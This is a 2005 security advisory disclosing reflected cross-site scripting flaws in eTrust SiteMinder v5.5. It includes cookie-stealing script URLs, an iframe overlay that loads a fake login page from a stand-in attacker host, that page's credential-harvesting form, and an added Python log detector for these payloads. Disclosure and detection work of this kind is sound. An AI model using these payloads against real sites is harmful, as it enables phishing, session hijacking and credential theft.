SiteMinder Multiple Vulnerabilities
/*
*****************************************************************************************************************
$ An open security advisory #10 - Siteminder v5.5 Vulnerabilities
*****************************************************************************************************************
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
2: Bug Released: July 08 2005
3: Bug Impact Rate: Medium / High
4: Bug Scope Rate: Remote
*****************************************************************************************************************
$ This advisory and/or proof of concept code must not be used for commercial gain.
*****************************************************************************************************************
Siteminder
http://www3.ca.com/Solutions/Product.asp?ID=5262
"eTrust SiteMinder® is a market-leading, security and management foundation for enterprise Web applications with a centralized security infrastructure for managing user authentication and access. eTrust SiteMinder delivers the market's most advanced security management capabilities and enterprise-class site administration, reducing overall IT operational cost and complexity. eTrust SiteMinder enables the secure delivery of essential information and applications to employees, partners, suppliers and customers, and scales with growing business needs."
Siteminder is vulnerable to XSS: a user can append HTML or JavaScript to various locations in a URL or input field and have the script run in the local user's browser. Because the injected markup is reflected into the login page, this can be used to perform phishing attacks, hijack users' browser sessions, or capture account credentials by redrawing the login page of a site.
http://vuln/siteminderagent/pwcgi/smpwservicescgi.exe?SMAUTHREASON=0&TARGET=&USERNAME=hacker&PASSWORD="><script>alert(document.cookie)</script>&BUFFER="><script>alert("Vulnerable")</script>
The following link abuses the TARGET URL option. First the user is logged out of the site with a timeout error, because she is sent off to another HTTPS site and then taken back to the login page. Next, an IFRAME is opened over the original login fields containing malicious Username and Password input fields, so the user supplies her login details to a malicious site, where they are later harvested and used in an attack.
http://site.com/siteminderagent/forms/login.fcc?TYPE=1&REALMOID=01-000000000-000000-0010-0000-0000000000000&GUID=&SMAUTHREASON=32&TARGET=http://site.com/servlet/yum/eat/user.html"><iframe bgcolor="white" src="https://attacker/snoop.html" style="position: absolute; top: 270px; left: 15 px;"></iframe><iframe src="https://attacker/snoop.html" style="position: absolute; top: 270px; left: 15 px;"></iframe>
To test whether you are vulnerable to this issue, append the following to the end of a Siteminder URL. If the injection is successful, you should see the Google homepage within an IFRAME.
"><iframe bgcolor="white" src="http://www.google.com" style="position: absolute; top: 270px; left: 15 px;"></iframe><iframe src="http://www.google.com" style="position: absolute; top: 270px; left: 15 px;"></iframe>
/* snoop.html */
<html>
<head></head>
<body>
<form>
User ID
<input type="text" name="UserID">
<br>
Password:
<input type="text" name="Password">
<input type="submit" value="Submit">
</form>
</body>
</html>
I have contacted Netegrity via ca.com multiple times but received no response; as such, users should use a filtering technology like modsecurity to detect the above-described attacks until a fix has been released.
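As an added example (not part of the original advisory or of any vendor code), the detection logic a filtering or log-review step could apply: it parses requests to the two SiteMinder agent endpoints named above and flags the reflected parameters (USERNAME, PASSWORD, BUFFER, TARGET, SMAUTHREASON) whose values contain a quote-and-bracket break-out or an active HTML tag, then runs that check over constructed access-log lines. The log format, IP addresses and timestamps are assumptions; the endpoint paths and parameter names come from the advisory.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# SiteMinder agent endpoints and the parameters the advisory shows being reflected.
SM_ENDPOINTS = ("/siteminderagent/pwcgi/smpwservicescgi.exe",
                "/siteminderagent/forms/login.fcc")
WATCHED_PARAMS = ("SMAUTHREASON", "TARGET", "USERNAME", "PASSWORD", "BUFFER")

# A quote-and-bracket break-out followed by a tag, or a bare active tag.
TAG_INJECTION = re.compile(
    r"""["']\s*>.*<\s*[a-z]|<\s*(script|iframe|img|svg|object|embed)\b""",
    re.IGNORECASE | re.DOTALL)
# CLF-style access log (assumed format): the request target sits between method and "HTTP/".
REQUEST_LINE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def check_request(url: str) -> list[str]:
    """Return the watched SiteMinder parameters whose value carries HTML/script markup."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith(SM_ENDPOINTS):
        return []
    flagged = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decoded once; decode again so double-encoded payloads
        # (%2522%253E for "> ) do not slip past the pattern.
        if name.upper() in WATCHED_PARAMS and TAG_INJECTION.search(unquote_plus(value)):
            flagged.append(name.upper())
    return flagged

def scan_access_log(lines):
    """Return (request_target, flagged_parameters) for every suspicious log line."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if m and (flagged := check_request(m.group(1))):
            hits.append((m.group(1), flagged))
    return hits

# Constructed sample log lines (not real traffic): two injection attempts, one normal login.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Jul/2005:10:12:01 +0000] "GET /siteminderagent/pwcgi/smpwservicescgi.exe'
    '?SMAUTHREASON=0&TARGET=&USERNAME=hacker&PASSWORD=%22%3E%3Cscript%3Ealert(document.cookie)'
    '%3C/script%3E&BUFFER=%22%3E%3Cscript%3Ealert(%22Vulnerable%22)%3C/script%3E HTTP/1.1" 200 1422',
    '10.0.0.6 - - [08/Jul/2005:10:13:44 +0000] "GET /siteminderagent/forms/login.fcc?TYPE=1'
    '&SMAUTHREASON=32&TARGET=http://site.com/user.html%22%3E%3Ciframe%20src=%22https://attacker/'
    'snoop.html%22%3E%3C/iframe%3E HTTP/1.1" 200 2210',
    '10.0.0.7 - - [08/Jul/2005:10:14:02 +0000] "GET /siteminderagent/forms/login.fcc?TYPE=1'
    '&SMAUTHREASON=0&TARGET=https://site.com/app HTTP/1.1" 302 0',
]
```

`scan_access_log(SAMPLE_LOG)` returns the first two requests, flagging PASSWORD and BUFFER on the first and TARGET on the second; the ordinary login on the third line produces no hit.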